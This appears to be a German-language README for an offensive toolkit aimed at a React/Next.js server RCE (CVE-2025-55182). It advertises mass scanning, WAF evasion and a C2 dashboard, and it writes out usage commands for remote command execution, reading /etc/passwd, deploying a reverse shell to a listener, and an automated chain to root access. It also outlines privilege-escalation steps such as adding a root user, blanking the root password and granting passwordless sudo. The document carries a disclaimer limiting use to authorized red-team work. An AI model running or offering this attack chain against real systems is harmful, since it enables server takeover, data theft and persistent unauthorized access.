Elite-Exploitation-Toolkit für CVE-2025-55182 (React Server Components RCE). Asynchrone polymorphe Payloads, erweiterte WAF/CDN-Umgehung, Proxy-Rotation, Shodan/Censys-Massenscan, Auto-Pwn + Reverse Shells, Nuclei-Vorlagen, K8s-Labor & C2-Dashboard. Verfasst von Sudeepa Wanigarathna – strengstens für autorisierte Red Team- und Penetrationstests.
██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗ ██╗
██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║ ██║
██║ █████╗ ██████╔╝██████╔╝█████╗ ██████╔╝██║ ██║
██║ ██╔══╝ ██╔══██╗██╔══██╗██╔══╝ ██╔══██╗██║ ██║
╚██████╗ ███████╗██║ ██║██████╔╝███████╗██║ ██║╚██████╔╝
╚═════╝ ╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝
React2Shell Exploitation Framework v1.0
Author: Sudeepa Wanigarathna
Professionelles Exploitation-Framework für die Next.js Server Actions RCE-Schwachstelle (React2Shell). Demonstriert die vollständige Angriffskette vom ersten Zugriff bis zur Root-Rechteausweitung.
Fähigkeiten:
# Schwachstelle prüfen
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Befehl ausführen
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"
python3 interactive_shell.py --target http://127.0.0.1:3000
# Vollständige Ausnutzung: RCE → Aufklärung → Root-Zugriff
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py # Kern-Exploit-Engine (400+ Zeilen)
├── demo_exploit.py # Automatisierte Angriffskette (290+ Zeilen)
├── interactive_shell.py # Interaktive Shell (280+ Zeilen)
├── reverse_shell_handler.py # Reverse-Shell-Listener (180+ Zeilen)
├── post_exploit/
│ ├── linux_enum.py # Systemaufklärung (330+ Zeilen)
│ ├── priv_esc.py # Rechteausweitung (320+ Zeilen)
│ └── __init__.py
├── EXPLOITATION_GUIDE.md # Vollständige Nutzungsdokumentation
├── QUICKSTART.md # Schnellreferenz
└── BANNER.txt
# Schwachstellenprüfung
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check
# Befehle ausführen
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"
# Verschiedene Payload-Varianten
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn
# Mit Verschleierung
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate
# Shell starten
python3 interactive_shell.py --target http://127.0.0.1:3000
# Verfügbare Befehle:
# - execute <cmd> : Shell-Befehl ausführen
# - enum : Vollständige Aufklärung ausführen
# - escalate : Rechteausweitung versuchen
# - upload <local> <remote> : Datei hochladen
# - download <remote> <local>: Datei herunterladen
# - shell <lhost> <lport>: Reverse Shell bereitstellen
# - info : Sitzungsinformationen anzeigen
# - exit : Beenden
# Terminal 1: Listener starten
python3 reverse_shell_handler.py --lport 4444
# Terminal 2: Shell bereitstellen
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
--revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash
# Vollständige Kette: Erkennung → RCE → Aufklärung → Root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root
Das Framework implementiert eine vollständige 6-stufige Exploitation-Kette:
id-Befehl bestätigen/etc/shadow und Auflisten von /root beweisenSUID-Binaries (GTFOBins)
Beschreibbare /etc-Dateien
/etc/passwd - Neuen Root-Benutzer hinzufügen/etc/shadow - Root-Passwort löschen/etc/sudoers - NOPASSWD sudo gewährenDocker-Escape
Kernel-Exploits
Linux-Capabilities
pip install -r requirements.txt
Abhängigkeiten:
EXPLOITATION_GUIDE.md - Vollständiger Nutzungsleitfaden mit BeispielenQUICKSTART.md - Schnellreferenz für gängige BefehleWARNUNG: Dieses Tool ist nur für autorisierte Sicherheitstests gedacht. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Testgenehmigung haben.
Der Autor ist nicht für Missbrauch dieses Tools verantwortlich. Nutzung auf eigene Gefahr.
Dieses Framework ist konzipiert für:
MIT-Lizenz (Nur für Bildungszwecke)
Sudeepa Wanigarathna
Version: 1.0
Zuletzt aktualisiert: Dezember 2025
Detaillierte Nutzungsanweisungen finden Sie in EXPLOITATION_GUIDE.md